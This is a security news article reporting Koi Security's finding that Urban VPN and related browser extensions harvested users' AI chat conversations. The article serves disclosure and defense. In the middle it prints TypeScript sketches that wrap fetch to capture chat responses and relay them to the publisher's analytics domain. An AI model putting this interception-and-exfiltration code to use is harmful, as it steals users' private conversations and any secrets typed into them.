Privacy breach: Chrome and Edge extensions secretly harvest AI conversations

Security researchers have uncovered a startling privacy breach in plain sight: several widely used Google Chrome and Microsoft Edge extensions — marketed as privacy and security tools — were quietly intercepting users’ conversations with AI assistants and sending those chats to third parties for commercial use. The discovery, published by Koi Security and rapidly corroborated by independent outlets, shows the behavior was embedded in the extensions by default, deployed via an update in July 2025, and active for months while the extensions continued to carry store “Featured” badges that gave users a false sense of trust.

Background

The issue came to light when the security firm Koi used an automated risk engine to scan browser extensions for hidden capabilities to read and exfiltrate data from AI chat platforms. The research points to a cluster of extensions (most notably Urban VPN Proxy and sibling products from the same publisher) that hook into browser pages for major AI services — including ChatGPT, Gemini, Claude, Microsoft Copilot, Perplexity, Grok (xAI), DeepSeek, and Meta AI — and capture full conversation traffic: prompts, responses, timestamps, conversation IDs, session metadata, and platform/model identifiers. Koi’s technical analysis documents how the extensions inject platform-specific scripts to intercept traffic and relay it to remote analytics endpoints.

The scale is significant: Koi and multiple reports estimate the combined user base across the affected Chrome and Edge extensions totals more than eight million installs, with Urban VPN Proxy alone reaching roughly six million Chrome users and over one million Edge users. That user count and the Featured status of these extensions raised immediate concerns about marketplace review processes and the reliability of the trust signals consumers rely on when installing browser add-ons.

How the harvesting worked: a technical breakdown

Script injection and API interception

According to the researchers, the extensions continually monitor open browser tabs and, when a user opens a targeted AI site, inject a dedicated “executor” JavaScript for that platform (for example, chatgpt.js, gemini.js, claude.js). These injected scripts wrap or override core browser network APIs — notably fetch and XMLHttpRequest — allowing them to see requests and responses in the page context before the content is rendered to the user. The scripts parse messages and metadata, package conversation data, and forward it via window.postMessage to the extension’s background worker for exfiltration.

This technique is powerful because it operates entirely inside the page context. Even though the underlying network traffic uses TLS, the scripts execute where decrypted content has already been made available to the page, so they can extract the conversational text and metadata the moment it arrives. Koi’s write-up describes the flow in four stages: detection (tab monitoring), injection, parsing/packaging, and exfiltration.
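To make the described pattern concrete, the sketch below shows, in simplified TypeScript, how a page-context script can wrap fetch and relay response bodies out of the page via window.postMessage. It illustrates the general technique Koi describes, not the publisher's actual code; the conversation endpoint path and message fields here are assumptions.

```typescript
// Minimal sketch of the interception pattern (illustrative only; the real
// executor code, endpoint paths, and message names are not public).
// Runs in the page context, where TLS-decrypted responses are already visible.

const originalFetch = window.fetch.bind(window);

window.fetch = async (input: RequestInfo | URL, init?: RequestInit): Promise<Response> => {
  const response = await originalFetch(input, init);
  const url =
    typeof input === "string" ? input : input instanceof URL ? input.toString() : input.url;

  // Hypothetical check for the platform's conversation API (path is an assumption).
  if (url.includes("/backend-api/conversation")) {
    // Clone so the page still receives an unread response body.
    response
      .clone()
      .text()
      .then((body) => {
        // Relay the captured content toward the extension's content script.
        window.postMessage({ source: "executor", capturedAt: Date.now(), url, body }, "*");
      })
      .catch(() => {
        /* ignore parse failures */
      });
  }

  return response;
};
```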

Exfiltration and analytics endpoints

Captured data was reported to be compressed and transmitted to remote endpoints under the publisher’s control, specifically to domains such as analytics.urban-vpn.com and stats.urban-vpn.com, according to the Koi analysis. The content flagged for exfiltration includes every prompt and AI response, conversation identifiers, timestamps, session attributes, and information about which AI model and platform were used. That dataset is particularly sensitive given how candid users often are when interacting with AI assistants.
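The exfiltration leg follows a standard Manifest V3 relay pattern: a content script bridges the page-context messages into the extension, and the background service worker posts the captured payload to a remote collector. The sketch below is a generic illustration of that flow, not the publisher's code; the payload shape and collector path are hypothetical, and only the analytics domain is taken from Koi's report.

```typescript
// content-script.ts: bridge page-context messages into the extension.
window.addEventListener("message", (event: MessageEvent) => {
  if (event.source !== window || event.data?.source !== "executor") return;
  chrome.runtime.sendMessage({ type: "captured-conversation", payload: event.data });
});

// background.ts (MV3 service worker): forward captured data to a remote collector.
chrome.runtime.onMessage.addListener((message) => {
  if (message?.type !== "captured-conversation") return;
  // Koi reported endpoints under the publisher's control, e.g. analytics.urban-vpn.com;
  // the "/collect" path below is a placeholder, not a documented endpoint.
  fetch("https://analytics.urban-vpn.com/collect", {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify(message.payload),
  }).catch(() => {
    /* fire-and-forget */
  });
});
```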

No opt-out; default-on harvesting

Crucially, the harvesting functionality was enabled by default and hard-coded into the extensions’ builds. That meant users had no practical setting to turn off the collection; the only way to stop it was to uninstall the extension. Koi’s timeline shows the collection behavior was added in a July 2025 update (identified as version 5.5.0) and was distributed via browser auto-update mechanisms.

Scope and scale: who and what was affected

  • Affected products included Urban VPN Proxy (Chrome and Edge), 1ClickVPN Proxy, Urban Browser Guard, and Urban Ad Blocker from the same publisher. Combined installs on Chrome and Edge exceeded eight million users.
  • Targeted AI platforms spanned the major commercial services that users rely on for personal and professional assistance: ChatGPT, Gemini, Claude, Microsoft Copilot, Perplexity, DeepSeek, Grok (xAI), and Meta AI. The publisher implemented a dedicated executor script for each platform, which indicates deliberate, per-platform targeting rather than an accidental bug.
  • The data collected included full conversational content and sensitive metadata — a dataset that could contain medical questions, financial details, proprietary code, credentials, or business secrets typed into AI chat windows. Koi advised users to assume that any AI conversations conducted after the July 2025 update may have been captured and shared.

Store approval, trust signals, and the marketplace gap

One of the more alarming findings of the investigation is that nearly all the affected extensions carried the Chrome Web Store or Microsoft Edge “Featured” badge — a designation many users interpret as a manual stamp of quality and safety. Koi’s findings and subsequent reporting emphasize how reliance on such store badges can be dangerously misleading when runtime behavior is not thoroughly validated during review.

Google’s own developer documentation and program policies include a Limited Use policy that constrains how extensions may collect, use, and — crucially — transfer user data. The policy explicitly forbids transferring or selling user data to third parties such as data brokers or information resellers, and requires that data collection be limited to clearly disclosed, single-purpose functionality. If an extension shared AI prompt/response data with an affiliate “data broker” for marketing analytics, that behavior would appear to violate the Limited Use policy.

At least two important gaps emerge from the public record: first, static listing review (checking UI assets, permissions, and a privacy policy) is insufficient to detect malicious runtime behavior; and second, automated or manual review processes appear to have failed to detect injected platform-specific code that executed only when particular AI sites were loaded. Multiple technical and editorial reports note the paradox of Featured badges applied to extensions that were covertly exfiltrating highly sensitive data.

Privacy, legal and commercial implications

The publisher’s privacy policy — as flagged by Koi — contains language describing data sharing with an affiliated data broker and mentions AI inputs and outputs as part of collected “browsing data.” That disclosure, while buried and not obviously presented to users, does indicate that the developer intended to monetize collected browsing and AI data. Whether the data was actively sold to identifiable third-party buyers, or merely shared with an affiliated analytics partner, is less clearly documented in public reporting. That distinction matters legally and operationally, and should be treated with caution until direct proof of downstream sales or identifiable purchasers emerges. From a regulatory perspective, multiple issues could be implicated:
  • Violation of platform rules: Chrome Web Store’s Limited Use policy explicitly forbids transferring user data to advertising platforms, data brokers, or resellers without proper constraints; similar rules apply for Microsoft Edge. If the publisher transferred AI chats to a data broker for marketing analytics, that may contravene store policies.
  • Consumer protection and privacy law: Depending on jurisdictions and the nature of the data (for example, health or financial information), regulators could view undisclosed mass harvesting of AI conversations as unfair or deceptive conduct under privacy and consumer protection statutes.
  • Contract and corporate risk: Enterprises that allow unmanaged extensions into employee browsers may face data leakage that violates confidentiality obligations or regulatory requirements such as HIPAA or PCI DSS when sensitive data is exposed.
Because aggregated AI chats can contain highly personal or confidential information, the commercial exploitation of this data is a serious privacy harm even if the exact monetization chain is not fully mapped in public reporting. Multiple independent outlets report the same basic privacy policy language and the same Koi technical findings, strengthening the factual basis for concern while underscoring that the presence of downstream buyers has not (as of the public reporting) been independently enumerated.

Enterprise risk: why IT teams need to act now

Browser extensions are a known vector for data exfiltration and privilege escalation — and this case demonstrates how a seemingly innocuous “privacy” or “ad block” extension can become an active surveillance mechanism. For organizations, the exposure risk is twofold:
  • Direct data leakage: Employees who use infected browsers for professional work could inadvertently leak trade secrets, customer PII, source code, or sensitive operational details via AI queries to external parties.
  • Third‑party access and lateral risk: Extensions with broad permissions can act as long-lived agents inside a corporate environment, making detection difficult and enabling collection over time.
Enterprise defensive guidance already includes extension management as a best practice. Administrators should implement policy-driven controls such as allowlists, blocklists, and forced installations of vetted security extensions, leveraging browser management features and Group Policy. Microsoft and Google both provide enterprise controls that allow organizations to block all extensions by default, allow only a curated set, or force-install necessary tools. These management capabilities are part of standard corporate hardening guidance and should be included in incident response planning.

Practical remediation checklist for users and IT admins

Security teams and everyday users must respond differently but urgently. The following steps synthesize the technical findings and practical controls that reduce exposure.
For individual users:
  • Uninstall any of the affected extensions immediately. Koi explicitly recommends removal and advises assuming that conversations may have been captured since the July 2025 update.
  • Review AI conversations you’ve had while the extension was installed; assume anything sent since July 9, 2025 could be in third-party hands and treat it as compromised.
  • Rotate credentials and secrets that may have been included in AI prompts (API keys, passwords, personal identification numbers) and enable multi-factor authentication where possible.
  • Disable or remove non-essential extensions and prefer open-source or enterprise-vetted tools when available.
For IT administrators and security teams:
  • Audit installed extensions across endpoints and identify any occurrences of the affected extension IDs. Koi published extension IDs and indicators useful for scanning; a minimal audit sketch follows this checklist.
  • Implement a default-deny extension posture: configure ExtensionInstallAllowlist or ExtensionInstallBlocklist via Group Policy, Microsoft Intune, or Google Chrome Browser Cloud Management to restrict installations to a curated set.
  • Force a credential rotation policy and require immediate resetting of service credentials used in browsers or pasted into AI chats where possible.
  • Use endpoint detection and response (EDR) tooling and browser telemetry to hunt for suspicious domains, unusual outbound connections, or the specific analytics endpoints reported (for example, the Urban VPN analytics domains identified by Koi).
  • Educate staff about the risks of running “privacy” extensions on corporate devices and enforce separation of browser profiles for sensitive tasks.
These steps prioritize containment and assume compromise; when large-scale data capture is possible, presuming exposure is a safer operational posture than hoping the privacy policy limited downstream use. Koi and multiple reporting outlets urge immediate uninstallation and remediation actions for affected users.
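For the audit step above, the hedged sketch below shows one way an admin-deployed extension with the "management" permission could enumerate installed extensions and flag known-bad IDs. The IDs shown are placeholders rather than Koi's published indicators, and many organizations would instead rely on Chrome Browser Cloud Management or endpoint inventory tooling for the same purpose.

```typescript
// Minimal audit sketch (assumes an MV3 admin-deployed extension with the
// "management" permission; Chrome extension APIs return promises in MV3).

const FLAGGED_EXTENSION_IDS = new Set<string>([
  "<affected-extension-id-1>", // placeholder, substitute the published indicators
  "<affected-extension-id-2>",
]);

async function auditInstalledExtensions(): Promise<void> {
  const installed = await chrome.management.getAll();
  for (const ext of installed) {
    if (FLAGGED_EXTENSION_IDS.has(ext.id)) {
      console.warn(`Flagged extension present: ${ext.name} (${ext.id}), enabled=${ext.enabled}`);
      // Report to an inventory/EDR pipeline here rather than acting silently.
    }
  }
}

auditInstalledExtensions();
```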

Marketplace responsibility and technical verification gaps

This incident highlights two structural problems in extension ecosystems:
  • Review limitations: Store review processes primarily validate listings against static criteria (UI assets, manifest permissions, privacy policy presence) and cannot easily simulate all runtime behaviors — especially when extensions inject platform-specific executor scripts only when certain web pages are loaded. The use of dynamic, targeted injection makes detection during a one-off review much harder.
  • Overreliance on trust indicators: Badges like “Featured” or “Established publisher” are helpful for surfacing quality extensions but are not guarantees of runtime safety. The presence of those badges on extensions that were shown to be harvesting AI conversations reveals a gap between perceived and actual trustworthiness.
A stronger review posture will require blended approaches: automated dynamic analysis that exercises extensions against widely used web apps (including AI services), periodic runtime scans of published extensions, and clearer policy enforcement — particularly around the Limited Use constraints that restrict third-party transfers of sensitive user data. Google’s Limited Use policy already prohibits transferring or selling user data to data brokers, and this incident underlines why enforcement must be operationally tighter.
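As a sketch of what such automated dynamic analysis could look like, the snippet below loads an extension into an instrumented Chromium session via Puppeteer, visits an AI chat page, and logs outbound requests to unexpected hosts. The extension path, allowlisted hosts, and target URL are assumptions; a production harness would also script real prompt/response interactions and compare traffic against a baseline.

```typescript
import puppeteer from "puppeteer";

const EXTENSION_PATH = "/path/to/unpacked/extension"; // extension under test (placeholder)
const EXPECTED_HOSTS = new Set(["chatgpt.com", "cdn.oaistatic.com"]); // illustrative allowlist

async function observeExtensionTraffic(): Promise<void> {
  const browser = await puppeteer.launch({
    headless: false, // extensions generally require a headed (or new-headless) Chrome
    args: [
      `--disable-extensions-except=${EXTENSION_PATH}`,
      `--load-extension=${EXTENSION_PATH}`,
    ],
  });
  const page = await browser.newPage();

  // Log any outbound request whose host is not on the expected list.
  page.on("request", (request) => {
    const host = new URL(request.url()).hostname;
    if (!EXPECTED_HOSTS.has(host)) {
      console.log(`Unexpected outbound request: ${request.method()} ${request.url()}`);
    }
  });

  await page.goto("https://chatgpt.com/", { waitUntil: "networkidle2" });
  // A fuller harness would script a prompt/response exchange before closing.
  await browser.close();
}

observeExtensionTraffic().catch(console.error);
```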

What regulators and platform owners should consider

  • Mandate runtime behavioral testing for extensions that hold broad permissions, using automated sandbox environments to simulate interactions with popular web apps and AI platforms.
  • Require clearer, prominent disclosures at install time when an extension will collect or share AI prompt/response content — not buried traces in a long privacy policy.
  • Enforce stricter penalties and rapid takedown for extensions found to be sharing user data with data brokers, including mandatory audits of any affiliated analytics firms named in privacy policies.
  • Expand marketplace transparency by exposing publisher verification details and the date/reason for any Featured or trusted badges so users can assess the strength of the endorsement.
These interventions would close gaps that allow “privacy” products to monetize sensitive conversational data with limited user comprehension or explicit consent.

Caveats and unresolved questions

  • Direct evidence of third-party purchases of harvested AI conversations has not been independently enumerated in public reporting; Koi’s analysis documents the capture and the publisher’s privacy-policy language about sharing with an affiliated data broker, but public records do not yet list identifiable buyers or downstream datasets. That means claims that data was “sold” should be treated with careful language until sales contracts or buyer records are confirmed. Koi and corroborating outlets report that the privacy policy permits disclosure to an affiliated data broker for marketing analytics, which is of material concern even absent verified buyers.
  • The precise retention and deletion practices for captured conversations on the publisher side are not publicly demonstrable; users and defenders should therefore assume retention until proven otherwise and act accordingly.

The bottom line: treat AI chats as potentially exposed and lock down the browser

This incident is a stark reminder that browsers and their extension ecosystems are high-risk surfaces for data leakage. Extensions marketed as privacy tools can — and in this case did — become surveillance tools when runtime behavior is not fully vetted and when privacy policies hide commercial uses behind dense legal language. Users should uninstall affected extensions and rotate secrets used in chats; enterprises should enforce allowlists, monitor for suspicious telemetry, and update incident-response plans to treat browser-based AI inputs as potentially compromised.
Marketplaces must do more than check boxes and screenshots: they must verify runtime behaviors for extensions with broad permissions, make disclosures clearer at installation time, and enforce the Limited Use rules that prohibit selling user data to data brokers. Only a coordinated approach — involving platform engineering, security research, enterprise controls, and possibly regulators — can prevent future cases where “privacy” tools quietly betray the users they claim to protect.
The threat vector exposed here is straightforward and solvable, but the cure requires sustained action: rigorous runtime analysis in store reviews, mandatory transparency at install time, and enterprise controls that remove the ability for untrusted extensions to run in sensitive contexts. In the meantime, the safest course is immediate removal of the implicated extensions, a presumption of compromise for any AI chats conducted since July 2025, and a rapid program of credential rotation and policy-driven extension management across corporate endpoints.
Source: ProPakistani, “These Google Chrome and Microsoft Edge Extensions Are Selling Your Private Data”
 
